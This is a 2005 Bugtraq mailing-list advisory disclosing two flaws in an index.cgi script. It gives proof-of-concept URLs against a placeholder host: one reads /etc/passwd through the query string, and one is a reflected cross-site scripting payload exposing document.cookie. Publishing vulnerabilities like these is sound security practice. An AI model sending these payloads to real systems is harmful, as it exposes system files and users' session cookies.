Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

index.cgi script XSS + file show

From: fireboy fireboy <fireboynet () webmails com>
Date: 24 Apr 2005 21:08:19 -0000


Tunis 24/04/2005
BUG found by fireboy
fireboy () webmails com



THERE ARE SOME BUGS IN  index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM 

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 



1)file showing
http://www.target.com/index.cgi?/etc/passwd


2)CSS
http://www.target.com/index.cgi?&lt;script&gt;alert(document.cookie)&lt;/script&gt;


greetz to all magattack members www.magattack.tk
Previous By Date Next
Previous By Thread Next

Current thread: